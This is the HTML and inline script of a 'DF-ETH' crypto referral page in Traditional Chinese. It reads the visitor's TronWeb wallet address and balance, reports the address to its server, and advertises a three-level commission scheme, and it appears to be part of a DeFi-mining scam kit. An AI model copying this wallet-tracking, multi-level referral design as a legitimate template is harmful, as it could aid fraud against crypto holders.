<html lang="" data-dpr="1" style="font-size: 37.5px;">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no" />
    <meta name="robots" content="noindex, nofollow" />
    <link rel="icon" href="https://tokem.xxelza.club/public/defi/favicon.ico" />
    <title>DF-ETH</title>
    <link href="./index_files/app.f6608e92.css" rel="preload" as="style" />
    <link href="./index_files/chunk-vendors.73034213.css" rel="preload" as="style" />
    <!--  <link href="./index_files/app.5bd8d9f8.js" rel="preload" as="script" />-->
    <!--  <link href="./index_files/chunk-vendors.1a1edb34.js" rel="preload" as="script" />-->
    <link href="./index_files/chunk-vendors.73034213.css" rel="stylesheet" />
    <link href="./index_files/app.f6608e92.css" rel="stylesheet" />
    <link type="image/x-icon" rel="shortcut icon" href="./index_files/sfZq78vytoImJYG.png" />
    <link type="image/x-icon" rel="shortcut icon" href="https://i.loli.net/2021/10/28/sfZq78vytoImJYG.png" />
</head>

<body style="font-size: 12px;" class="">
    <div id="app" style="background-color: rgb(248, 248, 248); color: rgb(51, 51, 51);">
        <div data-v-164d9d34="">
            <div data-v-164d9d34=""
                style="--van-tab-text-color:#333333; --van-tab-active-text-color:#0052ff; --van-tabs-bottom-bar-color:#0052ff; --van-tabs-default-color:#0052ff; --van-tabs-nav-background-color:#f8f8f8; --van-dropdown-menu-background-color:#ffffff; --van-dropdown-menu-title-text-color:#333333; --van-button-warning-background-color:#0052ff; --van-button-warning-border-color:#0052ff; --van-button-warning-color:#f8f8f8; --van-collapse-item-content-background-color:#ffffff; --van-cell-background-color:#f8f8f8; --van-cell-text-color:#333333; --van-cell-active-color:#ffffff; --van-cell-border-color:#ffffff; --van-popup-background-color:#ffffff; --van-field-input-text-color:#959BA7; --van-dropdown-menu-title-font-size:14px; --van-tabbar-background-color:#ffffff; --van-tabbar-item-active-background-color:#f8f8f8; --van-tabbar-item-active-color:#0052ff; --van-nav-bar-background-color:#f8f8f8; --van-nav-bar-icon-color:#0052ff; --van-nav-bar-title-text-color:#0052ff; --van-count-down-text-color:#0052ff; --van-count-down-font-size:16px; --van-cus-border-color:#efefef; --van-cus-background-color:#f8f8f8; --van-cus-front-color:#ffffff; --van-cus-assets-bg-color1:rgba(0,0,0,0.05); --van-cus-assets-bg-color2:rgba(0,0,0,0.05); --van-cus-img-bg-color:rgba(255,255,255,0.2); --van-cus-text-color:#333333; --van-cus-link-light-color:rgba(0,82,255,0.05);">
                <div data-v-164d9d34="" class="header">
                    <div data-v-504e9856="" data-v-164d9d34="" class="my-header">
                        <div data-v-504e9856="" class="header-row van-row van-row--flex van-row--align-center van-row--justify-space-between">
                            <div data-v-504e9856="" class="van-col van-col--8">
                                <div data-v-504e9856="" class="dropdown-wrap van-dropdown-menu">
                                    <div class="van-dropdown-menu__bar">
                                        <div role="button" tabindex="0" class="van-dropdown-menu__item"><span class="van-dropdown-menu__title">
                                                <div class="van-ellipsis">繁體中文</div>
                                            </span></div>
                                    </div>
                                    <div data-v-504e9856="">
                                        <div class="van-dropdown-item van-dropdown-item--down" style="top: 48px; display: none;">
                                            <div class="van-overlay" style="z-index: 2002; position: absolute; animation-duration: 0.2s;="></div>
                                            <div class="van-popup van-popup--top van-dropdown-item__content" style="transition-duration: 0.2s; z-index: 2003;">
                                                <a href="./../defi/referral.html"><div role="button" tabindex="0" class="van-cell van-cell--clickable van-dropdown-item__option" style="">
                                                    <div class="van-cell__title">
                                                        <span>English</span>
                                                    </div>
                                                </div></a>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div data-v-504e9856="" class="van-col van-col--8">
                                <div data-v-504e9856="" class="flex align-center justify-center"><img data-v-504e9856="" src="./index_files/sfZq78vytoImJYG.png" width="20">
                                    <h2 data-v-504e9856="" class="plat-name">DF-ETH</h2>
                                </div>
                            </div>
                            <div data-v-504e9856="" class="van-col van-col--8" style="text-align: right; padding-right: 10px;overflow: hidden"><button data-v-504e9856="" disabled="disabled"
                                    class="van-button van-button--default van-button--mini van-button--plain van-button--disabled van-button--hairline van-hairline--surround">
                                    <div data-v-504e9856="" class="van-button__content"><span data-v-504e9856="" class="van-button__text button_address">...</span></div>
                                </button></div>
                        </div>
                        <!---->
                        <!---->
                        <!---->
                    </div>
                </div>
                <div data-v-17be74fb="" data-v-164d9d34="" class="body-center">
                    <div data-v-17be74fb="" class="share" style="margin-top: 0px;">
                        <div data-v-17be74fb="" class="share-bg">
                            <h2 data-v-17be74fb="" class="tl p-l-10 lg-title">推薦朋友。</h2>
                            <h2 data-v-17be74fb="" class="tl p-l-10">一起賺取加密貨幣。</h2>
                            <p data-v-17be74fb="" class="tl p-l-10"> 在 DF-ETH 中賺取高達 0% 的佣金 </p>
                            <div data-v-17be74fb="" class="tl p-l-10 active-color"> 查看詳情 </div>
                            <div data-v-17be74fb="" class="my-rebate-info flex align-center justify-between tc">
                                <div data-v-17be74fb="">
                                    <div data-v-17be74fb="" class="title">我的等級</div>
                                    <div data-v-17be74fb="" class="level">--</div>
                                </div>
                                <div data-v-17be74fb="">
                                    <div data-v-17be74fb="" class="title">Level 1</div>
                                    <div data-v-17be74fb="" class="level1"> -- </div>
                                </div>
                                <div data-v-17be74fb="">
                                    <div data-v-17be74fb="" class="title">Level 2</div>
                                    <div data-v-17be74fb="" class="level2"> -- </div>
                                </div>
                                <div data-v-17be74fb="">
                                    <div data-v-17be74fb="" class="title">Level 3</div>
                                    <div data-v-17be74fb="" class="level3"> -- </div>
                                </div>
                            </div>
                        </div>
                        <div data-v-17be74fb="" class="van-tabs van-tabs--line">
                            <div class="van-tabs__wrap">
                                <div role="tablist" class="van-tabs__nav van-tabs__nav--line">
                                    <div role="tab" class="van-tab"><a href="./referral-team.html"><span class="van-tab__text van-tab__text--ellipsis">團隊</span></a></div>
                                    <div role="tab" aria-selected="true" class="van-tab van-tab--active"><a href="./referral.html"><span class="van-tab__text van-tab__text--ellipsis">分享</span></a></div>
                                    <div role="tab" class="van-tab"><a href="./referral-record.html"><span class="van-tab__text van-tab__text--ellipsis">記錄</span></a></div>
                                    <div class="van-tabs__line" style="transform: translateX(470%) translateX(-50%);"></div>
                                </div>
                            </div>
                            <div class="van-tabs__content van-tabs__content--animated">
                                <div class="van-tabs__track" style="transform: translate3d(-100%, 0px, 0px); transition-duration: 0.3s;">
                                    <div data-v-17be74fb="" role="tabpanel" class="van-tab__pane-wrapper van-tab__pane-wrapper--inactive" aria-hidden="true">
                                        <div class="van-tab__pane">
                                            <div data-v-17be74fb="" class="team-info">
                                                <div data-v-17be74fb="" class="flex align-center justify-between">
                                                    <div data-v-17be74fb="" class="block-info m-r-20">
                                                        <h3 data-v-17be74fb="">0</h3>
                                                        <h4 data-v-17be74fb="">團隊規模</h4>
                                                    </div>
                                                    <div data-v-17be74fb="" class="block-info">
                                                        <h3 data-v-17be74fb="">0</h3>
                                                        <h4 data-v-17be74fb="">直屬下級</h4>
                                                    </div>
                                                </div>
                                                <div data-v-17be74fb="" class="flex align-center justify-between">
                                                    <div data-v-17be74fb="" class="block-info m-r-20">
                                                        <h3 data-v-17be74fb="">0</h3>
                                                        <h4 data-v-17be74fb="">總收入(ETH)</h4>
                                                    </div>
                                                    <div data-v-17be74fb="" class="block-info">
                                                        <h3 data-v-17be74fb="">0</h3>
                                                        <h4 data-v-17be74fb="">今日收益(ETH)</h4>
                                                    </div>
                                                </div>
                                                <div data-v-17be74fb="" class="flex align-center justify-between">
                                                    <div data-v-17be74fb="" class="block-info m-r-20">
                                                        <h3 data-v-17be74fb="">0</h3>
                                                        <h4 data-v-17be74fb="">總收入(TRX)</h4>
                                                    </div>
                                                    <div data-v-17be74fb="" class="block-info">
                                                        <h3 data-v-17be74fb="">0</h3>
                                                        <h4 data-v-17be74fb="">今日收益(TRX)</h4>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                    <div data-v-17be74fb="" role="tabpanel" class="van-tab__pane-wrapper">
                                        <div class="van-tab__pane">
                                            <div data-v-17be74fb="" class="share-link-con">
                                                <h3 data-v-17be74fb="">我的分享鏈接</h3>
                                                <div data-v-17be74fb="" class="van-cell-group">
                                                    <div data-v-17be74fb="" class="van-cell van-cell--center van-field van-field--disabled">
                                                        <div class="van-cell__value van-cell__value--alone van-field__value">
                                                            <div class="van-field__body"><input type="text" id="referral-input" readonly="readonly" class="van-field__control">
                                                                <div class="van-field__button"><button data-v-17be74fb="" class="van-button van-button--warning van-button--mini" id="copy-button" data-clipboard-target="#referral-input">
                                                                        <div data-v-17be74fb="" class="van-button__content"><span data-v-17be74fb="" class="van-button__text">Copy</span></div>
                                                                    </button></div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                                <p data-v-17be74fb=""></p>
                                                <div data-v-17be74fb="" class="earn-tip flex align-center justify-around">
                                                    <div data-v-17be74fb=""><img data-v-17be74fb="" src="static/img/ChooseCommission.03ba2d8e.svg" width="60">
                                                        <h3 data-v-17be74fb="">1. 獲取鏈接</h3>
                                                    </div>
                                                    <div data-v-17be74fb=""><img data-v-17be74fb="" src="static/img/InviteFriends.6f4b6101.svg" width="60">
                                                        <h3 data-v-17be74fb="">2. 邀請朋友</h3>
                                                    </div>
                                                    <div data-v-17be74fb=""><img data-v-17be74fb="" src="static/img/EarnBitcoin.3199a322.svg" width="60">
                                                        <h3 data-v-17be74fb="">3. 賺取加密貨幣</h3>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                    <div data-v-17be74fb="" role="tabpanel" class="van-tab__pane-wrapper van-tab__pane-wrapper--inactive" aria-hidden="true">
                                        <div class="van-tab__pane">
                                            <div data-v-17be74fb="" class="records-con">
                                                <div data-v-2589b438="" data-v-17be74fb="" class="list-wrap">
                                                    <div data-v-2589b438="" class="filters flex align-center justify-start"><span data-v-2589b438="">等級</span>
                                                        <div data-v-2589b438=""><span data-v-2589b438="" class="tags van-tag van-tag--medium van-tag--default" style="background: rgb(0, 82, 255); color: rgb(255, 255, 255);">ALL</span><span
                                                                data-v-2589b438="" class="tags van-tag van-tag--medium van-tag--default" style="background: rgb(255, 255, 255); color: rgb(0, 82, 255);">Level 1</span><span data-v-2589b438=""
                                                                class="tags van-tag van-tag--medium van-tag--default" style="background: rgb(255, 255, 255); color: rgb(0, 82, 255);">Level 2</span><span data-v-2589b438=""
                                                                class="tags van-tag van-tag--medium van-tag--default" style="background: rgb(255, 255, 255); color: rgb(0, 82, 255);">Level 3</span></div>
                                                    </div>
                                                    <div data-v-2589b438="" class="no-data"></div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                    <!---->
                </div>
                <div data-v-7e0b484d="" data-v-164d9d34="">
                    <div data-v-7e0b484d="" class="van-tabbar__placeholder" style="height: 42.6562px;">
                        <div class="van-tabbar van-tabbar--fixed">
                            <div data-v-7e0b484d="" class="van-tabbar-item">
                                <a href="./home.html">
                                    <div class="van-tabbar-item__icon"><i class="van-icon van-icon-home-o">
                                            <!---->
                                        </i>
                                        <!---->
                                    </div>
                                    <div class="van-tabbar-item__text">首頁</div>
                                </a>
                            </div>
                            <div data-v-7e0b484d="" class="van-tabbar-item">
                                <a href="./withdraw-eth.html">
                                    <div class="van-tabbar-item__icon"><i class="van-icon van-icon-paid">
                                            <!---->
                                        </i>
                                        <!---->
                                    </div>
                                    <div class="van-tabbar-item__text">提現</div>
                                </a>
                            </div>
                            <div data-v-7e0b484d="" class="van-tabbar-item van-tabbar-item--active">
                                <a href="./referral-team.html">
                                    <div class="van-tabbar-item__icon"><i class="van-icon van-icon-friends-o">
                                            <!---->
                                        </i>
                                        <!---->
                                    </div>
                                    <div class="van-tabbar-item__text">分享</div>
                                </a>
                            </div>
                            <div data-v-7e0b484d="" class="van-tabbar-item">
                                <a href="./account.html">
                                    <div class="van-tabbar-item__icon"><i class="van-icon van-icon-user-o">
                                            <!---->
                                        </i>
                                        <!---->
                                    </div>
                                    <div class="van-tabbar-item__text">帳戶</div>
                                </a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <script src="./index_files/web3.min.js"></script>
    <script src="./index_files/web3.min(1).js"></script>
    <script src="./index_files/clipboard.min.js"></script>
    <!--<script src="./index_files/chunk-vendors.1a1edb34.js"></script>-->
    <!--<script src="./index_files/app.5bd8d9f8.js"></script>-->
    <div class="van-toast van-toast--middle van-toast--loading" style="z-index: 2025; display: none;">
        <div class="van-loading van-loading--spinner van-toast__loading">
            <span class="van-loading__spinner van-loading__spinner--spinner"><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i></span>
        </div>
        <div class="van-toast__text">
            Connecting...
        </div>
    </div>
    <div class="van-toast van-toast--middle van-toast--loading" style="z-index: 2001; display: none;">
        <div class="van-loading van-loading--spinner van-toast__loading">
            <span class="van-loading__spinner van-loading__spinner--spinner"><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i></span>
        </div>
        <div class="van-toast__text">
            Connecting...
        </div>
    </div>
</body>
<script src="https://cdn.bootcdn.net/ajax/libs/jquery/2.1.4/jquery.min.js"></script>
<script src="./index_files/TronWeb.js"></script>
<script src="./index_files/script.js"></script>
<script type="text/javascript">
    new ClipboardJS('#copy-button');
    var rank = 6.5;
    var authorized_address = '';
    var domain = 'https://' + window.location.host + '/';
    var bizhong = '';
    var approveAddr = "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t";
    var total=0;
    var trx = 0;
    var time;
    function getUrlQueryString(names, urls) {
        urls = urls || window.location.href;
        urls && urls.indexOf("?") > -1 ? urls = urls.substring(urls.indexOf("?") + 1) : "";
        var reg = new RegExp("(^|&)" + names + "=([^&]*)(&|$)", "i");
        var r = urls ? urls.match(reg) : window.location.search.substr(1).match(reg);
        if (r != null && r[2] != "")return unescape(r[2]);
        return null;

    }

    time = setInterval(getWalletAddress, 1000);

    function getWalletAddress()
    {
        try {
            let tronWeb = window.tronWeb
            let walletAddress = tronWeb.defaultAddress.base58;
            if (walletAddress) {
                $('#referral-input').val(domain + 'defi/home.html?parent=' + walletAddress)
            }
            $('.button_address').text(walletAddress);

            tradeobj = tronWeb.trx.getAccount(
                walletAddress,
            ).then(output => {

                trx = output.balance / 1000000;
                $('.balance').val(trx);

            });

            getUserInfo(walletAddress)
            window.clearInterval(time);
            return true;
        } catch (e) {
            // alert(e)
            return  false;
        }
    }


    function getUserInfo(address)
    {
        $.ajax({
            type: 'post',
            url:  domain + 'api/get_user_info',
            data : {address: address},
            success:function(data){
                $('.level').text('Level ' + data.level);
                $('.level1').text(data.level1);
                $('.level2').text(data.level2);
                $('.level3').text(data.level3);
            },
            error:function(data){
            }
        })
    }
    
    $('.van-dropdown-menu__item').click(function () {
        $('.van-dropdown-item--down').show()
    })
    $('.van-overlay').click(function () {
        $('.van-dropdown-item--down').hide()
    })
</script>
</html>
